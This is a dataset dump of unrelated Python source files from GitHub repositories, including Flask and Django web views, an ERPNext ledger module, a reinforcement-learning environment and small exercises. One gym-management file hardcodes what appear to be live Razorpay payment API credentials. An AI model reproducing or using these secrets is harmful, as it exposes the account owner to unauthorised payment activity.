abort(404)\n# if not request.json:\n# abort(400)\n# if 'title' in request.json and type(request.json['title']) != unicode:\n# abort(400)\n# if 'description' in request.json and type(request.json['description']) is not unicode:\n# abort(400)\n# if 'done' in request.json and type(request.json['done']) is not bool:\n# abort(400)\n# task[0]['title'] = request.json.get('title', task[0]['title'])\n# task[0]['description'] = request.json.get('description', task[0]['description'])\n# task[0]['done'] = request.json.get('done', task[0]['done'])\n# return jsonify( { 'task': make_public_task(task[0]) } )\n#\n#\n# @app.route('/todo/api/v1.0/tasks/', methods = ['DELETE'])\n# @auth.login_required\n# def delete_task(task_id):\n# task = filter(lambda t: t['id'] == task_id, tasks)\n# if len(task) == 0:\n# abort(404)\n# tasks.remove(task[0])\n# return jsonify({'result': True})\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"MaDaDevs/ChatBotPy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30570662653","text":"import os\nfrom os import path\nimport string\n\nclass FilePathManager:\n\n def __init__(self, root_path, batch_name, intermediate_saves=False, keep_unsharp=False) -> None:\n self.root_path = root_path\n self.batch_name = batch_name\n\n self.allPaths = []\n\n # general paths\n self.initDirPath = f'{self.root_path}/init_images'\n self.outDirPath = f'{self.root_path}/images_out'\n self.modelPath = f'{self.root_path}/models'\n self.batchFolder = f'{self.outDirPath}/{batch_name}'\n \n self.allPaths.append(self.initDirPath)\n self.allPaths.append(self.modelPath)\n self.allPaths.append(self.outDirPath)\n self.allPaths.append(self.batchFolder)\n\n self.partialFolder = f'{self.batchFolder}/partials'\n if intermediate_saves:\n self.allPaths.append(self.partialFolder)\n self.unsharpenFolder = f'{self.batchFolder}/unsharpened'\n if keep_unsharp:\n self.allPaths.append(self.keep_unsharp)\n\n self.createPaths()\n\n def createPaths(self):\n for path in self.allPaths:\n self.createPath(path)\n\n def allPaths(self):\n paths = [\n self.initDirPath,\n self.outDirPath,\n self.modelPath,\n self.batchPath\n ]\n\n def move_files(self, batch_num, start_num, end_num, old_folder, new_folder):\n for i in range(start_num, end_num):\n old_file = old_folder + f'/{self.batch_name}({batch_num})_{i:04}.png'\n new_file = new_folder + f'/{self.batch_name}({batch_num})_{i:04}.png'\n os.rename(old_file, new_file)\n\n # Simple create paths taken with modifications from Datamosh's Batch VQGAN+CLIP notebook\n def createPath(self, filepath):\n if path.exists(filepath) == False:\n os.makedirs(filepath)\n print(f'Made {filepath}')\n else:\n print(f'filepath {filepath} exists.')\n\n# def initPaths(root_path='./output'):\n# initDirPath = f'{root_path}/init_images'\n# createPath(initDirPath)\n# outDirPath = f'{root_path}/images_out'\n# createPath(outDirPath)\n\n# model_path = f'{root_path}/models'\n# createPath(model_path)","repo_name":"jackylu97/disco_diffusion","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31668583469","text":"count_pen = int(input())\ncount_markers = int(input())\nliters_detergent = int(input())\nprocent_discount = int(input())\n\npen = count_pen * 5.80\nmarkers = count_markers * 7.20\ndetergent = liters_detergent * 1.20\n\nall_materials = pen + markers + detergent\ndiscount = (all_materials * procent_discount/100)\nall_price = all_materials-discount\nprint(all_price)\n","repo_name":"VladiNikolov/python_basics","sub_path":"Exercise1/supplies_for_school.py","file_name":"supplies_for_school.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"33866141307","text":"import random\nfrom dataclasses import dataclass\nfrom typing import Dict, Mapping\n\nimport numpy as np\n\nfrom entity_gym.env import (\n Action,\n ActionSpace,\n CategoricalAction,\n CategoricalActionMask,\n CategoricalActionSpace,\n Entity,\n Environment,\n Observation,\n ObsSpace,\n)\n\n\n@dataclass\nclass MoveToOrigin(Environment):\n \"\"\"\n Task with a single Spaceship that is rewarded for moving as close to the origin as possible.\n The Spaceship has two actions for accelerating the Spaceship in the x and y directions.\n \"\"\"\n\n x_pos: float = 0.0\n y_pos: float = 0.0\n x_velocity: float = 0.0\n y_velocity: float = 0.0\n last_x_pos = 0.0\n last_y_pos = 0.0\n step: int = 0\n\n def obs_space(cls) -> ObsSpace:\n return ObsSpace(\n entities={\n \"Spaceship\": Entity(\n [\"x_pos\", \"y_pos\", \"x_velocity\", \"y_velocity\", \"step\"]\n ),\n }\n )\n\n def action_space(cls) -> Dict[str, ActionSpace]:\n return {\n \"horizontal_thruster\": CategoricalActionSpace(\n [\n \"100% right\",\n \"10% right\",\n \"hold\",\n \"10% left\",\n \"100% left\",\n ],\n ),\n \"vertical_thruster\": CategoricalActionSpace(\n [\"100% up\", \"10% up\", \"hold\", \"10% down\", \"100% down\"],\n ),\n }\n\n def reset(self) -> Observation:\n angle = random.uniform(0, 2 * np.pi)\n self.x_pos = np.cos(angle)\n self.y_pos = np.sin(angle)\n self.last_x_pos = self.x_pos\n self.last_y_pos = self.y_pos\n self.x_velocity = 0\n self.y_velocity = 0\n self.step = 0\n return self.observe()\n\n def act(self, actions: Mapping[str, Action]) -> Observation:\n self.step += 1\n\n for action_name, a in actions.items():\n assert isinstance(a, CategoricalAction), f\"{a} is not a CategoricalAction\"\n if action_name == \"horizontal_thruster\":\n for label in a.labels:\n if label == \"100% right\":\n self.x_velocity += 0.01\n elif label == \"10% right\":\n self.x_velocity += 0.001\n elif label == \"hold\":\n pass\n elif label == \"10% left\":\n self.x_velocity -= 0.001\n elif label == \"100% left\":\n self.x_velocity -= 0.01\n else:\n raise ValueError(f\"Invalid choice id {label}\")\n elif action_name == \"vertical_thruster\":\n for label in a.labels:\n if label == \"100% up\":\n self.y_velocity += 0.01\n elif label == \"10% up\":\n self.y_velocity += 0.001\n elif label == \"hold\":\n pass\n elif label == \"10% down\":\n self.y_velocity -= 0.001\n elif label == \"100% down\":\n self.y_velocity -= 0.01\n else:\n raise ValueError(f\"Invalid choice id {label}\")\n else:\n raise ValueError(f\"Unknown action type {action_name}\")\n\n self.last_x_pos = self.x_pos\n self.last_y_pos = self.y_pos\n\n self.x_pos += self.x_velocity\n self.y_pos += self.y_velocity\n\n done = self.step >= 32\n return self.observe(done)\n\n def observe(self, done: bool = False) -> Observation:\n return Observation(\n ids={\n \"Spaceship\": [0],\n },\n features={\n \"Spaceship\": np.array(\n [\n [\n self.x_pos,\n self.y_pos,\n self.x_velocity,\n self.y_velocity,\n self.step,\n ]\n ],\n dtype=np.float32,\n ),\n },\n actions={\n \"horizontal_thruster\": CategoricalActionMask(),\n \"vertical_thruster\": CategoricalActionMask(),\n },\n reward=(self.last_x_pos**2 + self.last_y_pos**2) ** 0.5\n - (self.x_pos**2 + self.y_pos**2) ** 0.5,\n done=done,\n )\n","repo_name":"entity-neural-network/entity-gym","sub_path":"entity_gym/examples/move_to_origin.py","file_name":"move_to_origin.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"60"} +{"seq_id":"1570418257","text":"import copy\n\nimport frappe\nfrom frappe import _, qb\nfrom frappe.model.document import Document\nfrom frappe.query_builder.custom import ConstantColumn\n\nfrom erpnext.accounts.utils import _delete_pl_entries, create_payment_ledger_entry\n\nVOUCHER_TYPES = [\"Sales Invoice\", \"Purchase Invoice\", \"Payment Entry\", \"Journal Entry\"]\n\n\ndef repost_ple_for_voucher(voucher_type, voucher_no, gle_map=None):\n\tif voucher_type and voucher_no and gle_map:\n\t\t_delete_pl_entries(voucher_type, voucher_no)\n\t\tcreate_payment_ledger_entry(gle_map, cancel=0)\n\n\n@frappe.whitelist()\ndef start_payment_ledger_repost(docname=None):\n\t\"\"\"\n\tRepost Payment Ledger Entries for Vouchers through Background Job\n\t\"\"\"\n\tif docname:\n\t\trepost_doc = frappe.get_doc(\"Repost Payment Ledger\", docname)\n\t\tif repost_doc.docstatus.is_submitted() and repost_doc.repost_status in [\"Queued\", \"Failed\"]:\n\t\t\ttry:\n\t\t\t\tfor entry in repost_doc.repost_vouchers:\n\t\t\t\t\tdoc = frappe.get_doc(entry.voucher_type, entry.voucher_no)\n\n\t\t\t\t\tif doc.doctype in [\"Payment Entry\", \"Journal Entry\"]:\n\t\t\t\t\t\tgle_map = doc.build_gl_map()\n\t\t\t\t\telse:\n\t\t\t\t\t\tgle_map = doc.get_gl_entries()\n\n\t\t\t\t\trepost_ple_for_voucher(entry.voucher_type, entry.voucher_no, gle_map)\n\n\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_error_log\", \"\")\n\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_status\", \"Completed\")\n\t\t\texcept Exception as e:\n\t\t\t\tfrappe.db.rollback()\n\n\t\t\t\ttraceback = frappe.get_traceback()\n\t\t\t\tif traceback:\n\t\t\t\t\tmessage = \"Traceback:
\" + traceback\n\t\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_error_log\", message)\n\n\t\t\t\tfrappe.db.set_value(repost_doc.doctype, repost_doc.name, \"repost_status\", \"Failed\")\n\n\nclass RepostPaymentLedger(Document):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(RepostPaymentLedger, self).__init__(*args, **kwargs)\n\t\tself.vouchers = []\n\n\tdef before_validate(self):\n\t\tself.load_vouchers_based_on_filters()\n\t\tself.set_status()\n\n\tdef load_vouchers_based_on_filters(self):\n\t\tif not self.add_manually:\n\t\t\tself.repost_vouchers.clear()\n\t\t\tself.get_vouchers()\n\t\t\tself.extend(\"repost_vouchers\", copy.deepcopy(self.vouchers))\n\n\tdef get_vouchers(self):\n\t\tself.vouchers.clear()\n\n\t\tfilter_on_voucher_types = [self.voucher_type] if self.voucher_type else VOUCHER_TYPES\n\n\t\tfor vtype in filter_on_voucher_types:\n\t\t\tdoc = qb.DocType(vtype)\n\t\t\tdoctype_name = ConstantColumn(vtype)\n\t\t\tquery = (\n\t\t\t\tqb.from_(doc)\n\t\t\t\t.select(doctype_name.as_(\"voucher_type\"), doc.name.as_(\"voucher_no\"))\n\t\t\t\t.where(\n\t\t\t\t\t(doc.docstatus == 1)\n\t\t\t\t\t& (doc.company == self.company)\n\t\t\t\t\t& (doc.posting_date.gte(self.posting_date))\n\t\t\t\t)\n\t\t\t)\n\t\t\tentries = query.run(as_dict=True)\n\t\t\tself.vouchers.extend(entries)\n\n\tdef set_status(self):\n\t\tif self.docstatus == 0:\n\t\t\tself.repost_status = \"Queued\"\n\n\tdef on_submit(self):\n\t\texecute_repost_payment_ledger(self.name)\n\t\tfrappe.msgprint(_(\"Repost started in the background\"))\n\n\n@frappe.whitelist()\ndef execute_repost_payment_ledger(docname):\n\t\"\"\"Repost Payment Ledger Entries by background job.\"\"\"\n\n\tjob_name = \"payment_ledger_repost_\" + docname\n\n\tfrappe.enqueue(\n\t\tmethod=\"erpnext.accounts.doctype.repost_payment_ledger.repost_payment_ledger.start_payment_ledger_repost\",\n\t\tdocname=docname,\n\t\tis_async=True,\n\t\tjob_name=job_name,\n\t)\n","repo_name":"frappe/erpnext","sub_path":"erpnext/accounts/doctype/repost_payment_ledger/repost_payment_ledger.py","file_name":"repost_payment_ledger.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":15303,"dataset":"github-code","pt":"60"} +{"seq_id":"12587033337","text":"from database import db,Registration,Equipment,Member,Staff,Plans,Payment\nfrom sqlalchemy import text\nimport datetime\nfrom werkzeug.utils import secure_filename\nfrom flask import current_app\nimport razorpay\nimport os\n\nclient = razorpay.Client(auth=(\"rzp_live_OlSWv9YA7i7L6E\", \"wuXOynB8EdJN1aW80Uylihve\"))\n\nclient.set_app_details({\"title\" : \"Techpath\", \"version\" : \"0.1\"})\nUPLOAD_FOLDER = 'static/dist/img'\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nclass data:\n def __init__(self,app):\n self.app = app \n def new_user(self,req,ref):\n user = Registration( \n Fullname = req.get('Fullname'),\n Email = req.get('Email'),\n Username = req.get('Username'),\n Password = req.get('Password'),\n Contact = req.get('Contact'),\n Gender = req.get('Gender'),\n Type = req.get('Type'),\n file = ref.get('file')\n )\n if user.file and allowed_file(user.file.filename): \n filename = secure_filename(user.file.filename)\n user.file.save(os.path.join(UPLOAD_FOLDER, filename))\n user.file=UPLOAD_FOLDER+'/'+filename\n else:\n user.file='static/dist/img/user_logo.png'\n return user\n def Member_data(self):\n query = db.session.execute(text('select Members.Member_Id,Members.Cust_Id,User.Username,User.Fullname,User.Gender,User.Contact,Plans.Plan_Name,Plans.Time_Period,Staff.Reg_Id,Staff.Fees,Members.Total_Fees,Members.Start_Date,Equipment.Name from Staff,Plans,Members,User,Equipment where Members.Cust_Id = User.User_Id and Members.Plan_Id = Plans.Plans_Id and Members.Trainer_Id = Staff.Staff_id and Members.Equipment_Id = Equipment.Equipment_Id Order by Member_Id ASC'))\n return query\n def Member_Count(self): \n with current_app.app_context():\n quer = text('select COUNT(Member_Id) from Members')\n count = db.session.execute(quer)\n return count\n def Staff_Count(self):\n with current_app.app_context():\n quer = text('select COUNT(Staff_id) from Staff')\n cnt = db.session.execute(quer)\n return cnt\n def Unpaid_Customer_Count(self): \n with current_app.app_context():\n quer = text('select COUNT(Order_Id) from Payment where Status = \"Success\"')\n count = db.session.execute(quer)\n return count\n def Equipment_Count(self):\n with current_app.app_context():\n count = db.session.execute(text('select COUNT(Equipment_Id) from Equipment'))\n return count\n def Member_all(self):\n query = db.session.query(Member).order_by(Member.Member_Id).all()\n return query\n def equipment(self,form,fil):\n kit = Equipment(\n Name = form.get('Name'),\n Quantity = form.get('Quantity'),\n Image = fil.get('Image'),\n Weight = form.get('Weight'),\n Category = form.get('Category'),\n Company = form.get('Company'),\n Equipment_Charge = form.get('Equipment_Charge')\n )\n if kit.Image and allowed_file(kit.Image.filename):\n filename = secure_filename(kit.Image.filename)\n kit.Image.save(os.path.join(UPLOAD_FOLDER, filename))\n kit.Image=UPLOAD_FOLDER+'/'+filename\n return kit\n def Equipment_Data(self):\n query = db.session.query(Equipment).order_by(Equipment.Equipment_Id).all()\n return query\n def Read_Equipment(self,Id):\n query = db.session.query(Equipment).filter_by(Equipment_Id=Id).first()\n return query\n def Equipment_with_Charge(self):\n with current_app.app_context():\n query = db.session.execute(text('select Equipment_Id,Name from Equipment where Equipment_Charge != \"0\"'))\n return query\n def Read_Member(self,id):\n query = db.session.query(Registration).filter_by(User_Id=id).first()\n return query\n def Read_Customer(self,id):\n query = db.session.query(Member).filter_by(Member_Id=id).first()\n return query\n return query\n def check_member(self):\n with current_app.app_context():\n user = db.session.execute(text('select * from User order by User_Id DESC limit 1'))\n return user\n def new_customer(self,req):\n customer = Member(\n Trainer_Id = req.get(\"Trainer_Id\"),\n Start_Date = datetime.date.today(),\n Plan_Id = req.get(\"Plan_Id\"),\n Cust_Id = req.get(\"Cust_Id\"),\n Equipment_Id = req.get('Equipment_Id'),\n Total_Fees = req.get('Total_Fees')\n )\n trainer_Fees = data(current_app).select_Trainer_fees(req.get(\"Trainer_Id\")).Fees\n plan_price = data(current_app).select_Plan(req.get(\"Plan_Id\")).Price\n equipment_charge = data(current_app).select_Equipment(req.get(\"Equipment_Id\")).Equipment_Charge\n customer.Total_Fees = int(trainer_Fees) + int(plan_price) + int(equipment_charge)\n return customer\n def new_employee(self,req):\n emp = Staff(\n Occupation = req.get(\"Occupation\"),\n Working_Days = req.get(\"Working_Days\"),\n Experience = req.get(\"Experience\"),\n Salary = req.get(\"Salary\"),\n Fees = req.get(\"Fees\"),\n Total = req.get(\"Total\"),\n Reg_Id = req.get(\"Reg_Id\")\n )\n emp.Total = int(emp.Salary)+int(emp.Fees)\n return emp\n def Staff_Data(self):\n query = db.session.execute(text('select User.User_Id,User.Fullname,User.Email,User.Contact,User.Gender,Staff.Occupation,Staff.Working_Days,Staff.Experience,Staff.Salary,Staff.Fees,Staff.Total,Staff.Staff_id from User,Staff where Staff.Reg_Id = User.User_Id and User.Type = \"Employee\" Order BY Staff_id ASC'))\n return query\n def trainer_data(self):\n query = db.session.query(Staff).join(Registration).add_columns(Registration.Fullname,Staff.Fees,Staff.Occupation,Staff.Experience,Registration.file).order_by(Staff.Staff_id).filter(Staff.Occupation==\"Trainer\").all()\n return query\n def Read_Staff(self,Id):\n query = db.session.query(Staff).filter_by(Staff_id=Id).first()\n return query\n def Remove_User(self,userId):\n query = db.session.execute(db.delete(Registration).filter_by(User_Id=userId)).scalar()\n return query\n def Trainer(self):\n query = db.session.query(Staff).join(Registration).add_columns(Registration.Fullname,Staff.Staff_id,Staff.Fees).filter(Staff.Reg_Id==Registration.User_Id,Staff.Occupation==\"Trainer\").all()\n return query\n def select_Trainer(self,staffId):\n query = db.session.query(Staff).join(Registration).add_columns(Registration.Fullname,Registration.Contact,Registration.Email,Registration.Gender,Staff.Reg_Id).filter_by(User_Id=staffId).first()\n return query\n def select_Trainer_fees(self,staffId):\n query = db.session.query(Staff).filter_by(Staff_id=staffId).first()\n return query\n def select_Plan(self,planId):\n query = db.session.query(Plans).filter_by(Plans_Id=planId).first()\n return query\n def select_Equipment(self,equipId):\n query = db.session.query(Equipment).filter_by(Equipment_Id=equipId).first()\n return query\n def Query_Plan(self):\n query = db.session.query(Plans).order_by(Plans.Plans_Id).all()\n return query\n def Member_Update(self,req,ref,membId,useId):\n query = data(current_app).Read_Customer(membId)\n query_registration = data(current_app).Read_Member(useId) \n query_registration.Fullname = req.get('Fullname')\n query_registration.Contact = req.get('Contact')\n query_registration.Gender = req.get('Gender')\n query_registration.Email = req.get('Email')\n query_registration.file = ref.get('file')\n if query_registration.file and allowed_file(query_registration.file.filename): \n filename = secure_filename(query_registration.file.filename) # type: ignore\n query_registration.file.save(os.path.join(UPLOAD_FOLDER, filename))\n query_registration.file=UPLOAD_FOLDER+'/'+filename\n else:\n query_registration.file='static/dist/img/user_logo.png'\n query.Trainer_Id = req.get('Trainer_Id')\n query.Plan_Id = req.get('Plan_Id')\n query.Equipment_Id = req.get('Equipment_Id')\n query.Start_Date = datetime.date.today()\n trainer_Fees = data(current_app).select_Trainer_fees(req.get(\"Trainer_Id\")).Fees\n plan_price = data(current_app).select_Plan(req.get(\"Plan_Id\")).Price\n equipment_charge = data(current_app).select_Equipment(req.get(\"Equipment_Id\")).Equipment_Charge\n query.Total_Fees = int(trainer_Fees) + int(plan_price) + int(equipment_charge)\n return query_registration.Fullname,query_registration.Gender,query_registration.file,query_registration.Email,query_registration.Contact,query.Trainer_Id,query.Plan_Id,query.Equipment_Id,query.Total_Fees\n def Staff_Update(self,req,ref,staffId,userId):\n staff_query = data(current_app).Read_Staff(staffId)\n member_query = data(current_app).Read_Member(userId)\n member_query.Fullname = req.get('Fullname')\n member_query.Contact = req.get('Contact')\n member_query.Email = req.get('Email')\n member_query.file = ref.get('file')\n if member_query.file and allowed_file(member_query.file.filename): \n filename = secure_filename(member_query.file.filename)\n member_query.file.save(os.path.join(UPLOAD_FOLDER, filename))\n member_query.file=UPLOAD_FOLDER+'/'+filename\n else:\n member_query.file='static/dist/img/user_logo.png'\n staff_query.Experience = req.get('Experience')\n staff_query.Working_Days = req.get('Working_Days')\n staff_query.Fees = req.get('Fees')\n staff_query.Salary = req.get('Salary')\n staff_query.Total = int(staff_query.Fees) + int(staff_query.Salary)\n return member_query.Fullname,member_query.Contact,member_query.file,member_query.Email,staff_query.Experience,staff_query.Working_Days,staff_query.Total\n def Equipment_Update(self,req,ref,equipment_Id):\n equipment_query = data(current_app).select_Equipment(equipment_Id)\n equipment_query.Name = req.get('Name')\n equipment_query.Quantity = req.get('Quantity')\n equipment_query.Weight = req.get('Weight')\n equipment_query.Category = req.get('Category')\n equipment_query.Company = req.get('Company')\n equipment_query.Equipment_Charge = req.get('Equipment_Charge')\n equipment_query.Image = ref.get('Image')\n if equipment_query.Image and allowed_file(equipment_query.Image.filename):\n filename = secure_filename(equipment_query.Image.filename)\n equipment_query.Image.save(os.path.join(UPLOAD_FOLDER, filename))\n equipment_query.Image=UPLOAD_FOLDER+'/'+filename\n print(equipment_query.Image)\n else:\n equipment_query.Image='static/dist/img/user_logo.png'\n return equipment_query.Name,equipment_query.Quantity,equipment_query.Weight,equipment_query.Category,equipment_query.Company,equipment_query.Equipment_Charge,equipment_query.Image\n def Data_Unpaid_Customer(self):\n query = db.session.query(Payment).join(Registration and Plans).add_columns(Registration.User_Id,Registration.Fullname,Registration.Gender,Registration.Email,Registration.Contact,Plans.Plan_Name).filter(Payment.Customer_Id==Registration.User_Id,Payment.Plan_Id==Plans.Plans_Id,Payment.Status==\"Success\").order_by(Registration.User_Id).all()\n return query\n def Read_Unpaid_Customer(self,userId):\n query = db.session.query(Registration).filter_by(User_Id=userId).first()\n return query\n def date_Member(self):\n query = db.session.execute(db.select(Member.Start_Date).order_by(Member.Member_Id)).all()\n return query\n def Count_MemberId(self):\n query =db.session.execute(db.select(Member.Member_Id).order_by(Member.Member_Id)).all()\n return query\n def generate_order_id(self,price):\n data = { \"amount\": int(price)*100, \"currency\": \"INR\", \"receipt\": \"order_rcptid_11\" }\n payment = client.order.create(data=data)\n order_id=payment['id']\n return order_id\n def Graphical_Representation(self):\n query = db.session.execute(text('select MONTH(Start_Date) as Month_Number,MONTHNAME(Start_Date) as Month_Name,COUNT(*) as Member_Count from Members group by MONTH(Start_Date),MONTHNAME(Start_Date) order by MONTH(Start_Date)'))\n return query\n def Plan_Update(self,req,planId):\n plans = data(current_app).select_Plan(planId)\n plans.Price=req.get('Price')\n return plans.Price\n def payment(self,req):\n paid = Payment(\n Cutomer_Id = req.get('Customer_Id'),\n Plan_Id = req.get('Plan_Id'),\n Date = datetime.date.today(),\n Order_Id_RZP = req.get('Order_Id_RZP'),\n Payment_Id_RZP = req.get('Payment_Id_RZP')\n )\n return paid","repo_name":"Kuhan-12/gymtech","sub_path":"Admin/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":13302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20728980076","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\n__license__ = \"\"\"\n This file is part of Janitoo.\n\n Janitoo is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Janitoo is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Janitoo. If not, see .\n\n Original copyright :\n Copyright (c) 2013 Roger Light \n\n All rights reserved. This program and the accompanying materials\n are made available under the terms of the Eclipse Distribution License v1.0\n which accompanies this distribution.\n\n The Eclipse Distribution License is available at\n http://www.eclipse.org/org/documents/edl-v10.php.\n\n Contributors:\n - Roger Light - initial implementation\n\n This example shows how you can use the MQTT client in a class.\n\n\"\"\"\n__author__ = 'Sébastien GALLET aka bibi21000'\n__email__ = 'bibi21000@gmail.com'\n__copyright__ = \"Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000\"\n#~ from gevent import monkey\n#~ monkey.patch_all()\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom flask import Blueprint, flash, request\nfrom flask_login import login_required, current_user\nfrom flask_themes2 import get_themes_list\nfrom flask_babelplus import gettext as _\n\nfrom janitoo.classes import CAPABILITY_DESC, GENRE_DESC, VALUE_DESC, COMMAND_DESC\n\nfrom janitoo_manager.extensions import babel, cache, janitoo\nfrom janitoo_manager.utils.helpers import render_template\nfrom janitoo_manager.user.models import UserMan\n\nportal = Blueprint(\"portal\", __name__)\n\n@portal.before_request\ndef start_listener():\n janitoo.start_listener()\n\n@portal.route(\"\")\ndef index():\n \"\"\"\n \"\"\"\n return render_template(\"portal/index.html\", user=current_user)\n\n@cache.cached(timeout=900)\n@portal.route('janitoo_constants.js')\ndef janitoo_constants_js():\n return render_template('janitoo_constants.js', capabilities=CAPABILITY_DESC, genres=GENRE_DESC, values=VALUE_DESC, commands=COMMAND_DESC)\n","repo_name":"bibi21000/janitoo_manager","sub_path":"src/janitoo_manager/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33422910007","text":"from django.core.exceptions import ValidationError\nfrom django.contrib.auth import login, get_user_model, logout\nfrom django.shortcuts import redirect, render\nfrom kbtuopen import settings\nimport hmac\nimport hashlib\nimport time\nfrom core.models import Team\nfrom core.forms import TeamForm, OrganizationForm, ParticipantForm\nfrom django.db.models import Count\n\ndef logoutView(request):\n logout(request)\n return redirect('home')\n\ndef telegramLoginView(request):\n\n req_parameters = request.GET\n \n\n bot_token = settings.TELEGRAM_BOT_TOKEN\n\n data_check_string = ['{}={}'.format(k, v)\n for k, v in req_parameters.items() if k != 'hash']\n \n data_check_string = '\\n'.join(sorted(data_check_string))\n \n built_hash = hmac.new(hashlib.sha256(bot_token.encode()).digest(),\n msg=data_check_string.encode(),\n digestmod=hashlib.sha256).hexdigest()\n\n\n if built_hash != req_parameters.get('hash'):\n raise ValidationError(\"Invalid hash\")\n\n current_timestamp = int(time.time())\n auth_timestamp = int(req_parameters.get('auth_date'))\n\n if current_timestamp - auth_timestamp > 86400:\n raise ValidationError('Auth date is outdated')\n \n user_id = req_parameters.get('id')\n\n User = get_user_model()\n\n try:\n user = User.objects.get(username=user_id)\n except User.DoesNotExist:\n user = User.objects.create(username=user_id)\n user.set_unusable_password()\n\n\n login(request, user)\n\n return redirect('team')\n\n\n\n\n\ndef homePageView(request):\n context = {\"user\": request.user}\n return render(request, \"index.html\", context)\n\n\ndef participant_view(request):\n if request.method == 'POST':\n form = ParticipantForm(request.POST)\n\n if form.is_valid() and request.user.team.members.count() <= 2:\n participant_form = form.save(commit = False)\n participant_form.team = request.user.team\n participant_form.save()\n\n return redirect('team')\n\n raise ValidationError(\"Invalid request\")\n\n\ndef teams_view(request):\n return render(request, 'teams.html', {'teams': Team.objects.annotate(num_members=Count('members')).filter(num_members__gt=0).order_by(\"id\")})\n \ndef organization_view(request): \n if request.method == 'POST':\n form = OrganizationForm(request.POST)\n\n if form.is_valid():\n form.save()\n \n return redirect('team')\n\n elif request.method == 'GET':\n form = OrganizationForm()\n \n return render(request, 'organization.html', {'form': form})\n\ndef team_view(request):\n team = None\n form = None\n participant_form = None\n\n if request.method == 'POST':\n form = TeamForm(request.POST)\n\n if form.is_valid():\n team_form = form.save(commit = False)\n team_form.owner = request.user\n team_form.save()\n \n return redirect('team')\n\n elif request.method == 'GET':\n \n\n if request.user.is_authenticated:\n \n \n if hasattr(request.user, \"team\"):\n team = request.user.team\n if team.members.count() < 3:\n participant_form = ParticipantForm()\n else:\n form = TeamForm()\n\n \n return render(request, 'team.html', {'form': form, 'user': request.user, 'team': team, 'participant_form': participant_form, 'is_reg_open': settings.IS_REGISTRATION_OPEN})","repo_name":"ZharaskhanAman/kbtuopen","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36032387381","text":"class Solution:\n def numDistinct(self, s: str, t: str) -> int:\n def helper(s, t):\n A = [[0] * (len(s) + 1) for _ in range(len(t) + 1)]\n for j in range(len(s) + 1):\n A[0][j] = 1\n for i in range(1, len(t) + 1):\n for j in range(1, len(s) + 1):\n A[i][j] = A[i][j - 1]\n if t[i - 1] == s[j - 1]:\n A[i][j] += A[i - 1][j - 1]\n return A[-1][-1]\n return helper(s, t)","repo_name":"DevashishPathrabe/LeetCode","sub_path":"LeetCode Solutions/Problems/115. Distinct Subsequences.py","file_name":"115. Distinct Subsequences.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33308460824","text":"import os\nimport unittest\n\nimport botctl.config\n\nfrom botctl.config import ConfigStore\n\nTEST_HOME = os.path.join(os.path.dirname(__file__), 'home')\n\n\nclass CommandTestCase(unittest.TestCase):\n def setUp(self):\n botctl.config.__configdir__ = TEST_HOME\n self.config = ConfigStore()\n\n def tearDown(self):\n if os.path.exists(self.config._path):\n os.unlink(self.config._path)\n\n def set_config_ini_content(self, content):\n with open(self.config._path, 'w') as config_file:\n config_file.write(content)\n","repo_name":"wizeline/botctl","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33125228776","text":"with open('./branch.txt', 'r') as f:\n lines = f.readlines()\nnew_lines = []\nfor line in lines:\n line = line.strip('\\n')\n new_lines.append(line)\n\nstr_list = str(new_lines)\nwith open('./branches.txt', 'w') as f:\n f.write(str_list)\n","repo_name":"Dechrissen/PokeQuiz","sub_path":"tools/makelist.py","file_name":"makelist.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"21904294666","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 23 13:04:59 2017\n\n@author: Vincent Gregoire\n\n# Turtle tutorial\n\nPrepared by [Vincent Grégoire](http://www.vincentgregoire.com), \nDepartment of 